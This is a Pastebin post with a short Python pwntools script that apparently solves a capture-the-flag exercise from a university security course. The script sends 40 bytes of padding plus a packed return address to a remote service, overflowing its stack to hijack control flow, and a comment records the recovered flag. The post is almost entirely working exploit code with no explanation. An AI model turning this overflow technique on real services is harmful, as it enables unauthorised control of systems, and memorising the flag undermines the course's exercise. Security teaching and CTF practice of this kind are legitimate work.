Advertisement
Guest User

Untitled

a guest
Sep 15th, 2019
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.25 KB | None | 0 0
  1. from pwn import *
  2. connection = remote('shepherd.ii.uib.no', 9002)
  3. print(connection.recvline())
  4. connection.sendline("aaaabbbbccccddddeeeeffffgggghhhhiiiijjjj" + p64(0x0000000000401162))
  5. print(connection.recvline())
  6.  
  7. #INF226{gg_f0r_c0ntr0ll1ng_31P}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement